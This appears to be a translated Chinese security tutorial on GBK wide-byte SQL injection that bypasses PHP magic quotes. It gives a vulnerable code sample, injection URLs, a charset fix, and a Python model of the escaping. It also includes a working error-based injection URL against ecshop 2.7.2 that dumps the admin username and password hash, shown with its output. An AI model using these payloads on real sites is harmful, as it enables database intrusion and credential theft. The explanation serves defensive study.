Source: 自学PHP网 | Date: 2015-04-17 11:59
When the MySQL database behind a PHP application uses GBK encoding, you must watch out for the GBK wide-byte encoding vulnerability.
Look at the code in test.php:
require_once('mysql.php');   // mysql.php provides the db class used below (not shown in the post)
$newdb = new db();
$user = $_GET['user'];       // untrusted input, relying on magic_quotes_gpc for escaping
$t = "SELECT * FROM user WHERE user='{$user}'";
$dataRs = $newdb->selects($t);
Normally magic_quotes_gpc is ON, so if you request
http://www.2cto.com/safe/inject.php?user=11' and 1=2 #
the SQL statement becomes
SELECT * FROM user WHERE user='1\' and 1=2 #'
The \ escape is added automatically. But what if we construct a special wide-byte encoding?
http://www.test.com/safe/inject.php?user=11%df%27 and 1=2 #
The SQL statement then becomes
SELECT * FROM user WHERE user='11運' and 1=2#'
Isn't that an injection?
What happens is that %df swallows the \ that gpc inserts: the two bytes are parsed as the GBK character 運 (so 11%df reads as 11運), while %27 is wickedly parsed as a bare ', bypassing the gpc escaping and completing the injection.
Referenced article: http://www.2cto.com/Article/201207/139595.html
Fix: http://www.2cto.com/Article/201301/182880.html
Replace the original SET NAMES gbk with
mysql_set_charset("gbk", $this->conn);
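To show why the escaping described above fails with SET NAMES gbk but holds once the connection charset is set properly, here is an added byte-level model (not the post's code, not libmysql or MySQL server code): a charset-unaware escaper beside a GBK-aware one, each checked by a simplified GBK-aware lexer. The payload is the post's own user=11%df%27 input; the escaper and lexer are simplified assumptions about the charset-aware behaviour that mysql_set_charset("gbk") enables.

```python
# Added example, not the post's code: a byte-level model of the two escaping
# strategies the post contrasts. The GBK-aware escaper and lexer are simplified
# models of what mysql_set_charset("gbk") enables, not libmysql or server code.

def is_gbk_lead(b): return 0x81 <= b <= 0xFE                  # first byte of a GBK pair
def is_gbk_trail(b): return 0x40 <= b <= 0xFE and b != 0x7F   # second byte of a GBK pair

def escape_naive(data):  # charset-unaware, magic_quotes_gpc / addslashes style
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out += b"\\"
        out.append(b)
    return bytes(out)

def escape_gbk_aware(data):  # escaping that knows the connection charset is GBK
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if is_gbk_lead(b) and i + 1 < len(data) and is_gbk_trail(data[i + 1]):
            out += data[i:i + 2]   # complete GBK character: copy untouched
            i += 2
            continue
        if is_gbk_lead(b) or b in b"'\"\\\x00":
            out += b"\\"           # an orphan lead byte is escaped too, so it can
        out.append(b)              # never pair with a backslash added later
        i += 1
    return bytes(out)

def literal_end(sql, start):
    """Index of the quote closing the literal opened at sql[start] (GBK-aware lexer)."""
    i = start + 1
    while i < len(sql):
        if is_gbk_lead(sql[i]) and i + 1 < len(sql) and is_gbk_trail(sql[i + 1]):
            i += 2                 # one two-byte character; neither quote nor backslash
        elif sql[i] == 0x5C:
            i += 2                 # backslash escapes the next byte
        elif sql[i] == 0x27:
            return i
        else:
            i += 1
    return -1

def literal_intact(user, escape):
    """True if the escaped value stays inside its quotes in the post's query."""
    sql = b"SELECT * FROM user WHERE user='" + escape(user) + b"'"
    return literal_end(sql, sql.index(b"'")) == len(sql) - 1

PAYLOAD = b"11\xdf' and 1=2 #"    # constructed: the post's user=11%df%27 input, URL-decoded
print(literal_intact(PAYLOAD, escape_naive), literal_intact(PAYLOAD, escape_gbk_aware))  # False True
```

With the naive escaper the lexer closes the literal at the injected quote; with the GBK-aware escaper the orphan 0xdf is itself escaped, so the added backslash can no longer be absorbed into a character and the literal runs to its real closing quote.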
The ecshop 2.7.2 GBK edition has the same vulnerability. Simply request
http://www.xx.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
and it throws the error
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT user_id FROM `shop`.`ecs_users` WHERE user_name='Μ' and 1=1 union select 1 and (select 1 from(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #' ) [2] => Array ( [error] => Duplicate entry '[admin:7fef6171469e80d32c0559f88b377245]1' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) )
which leaks the account name and password hash.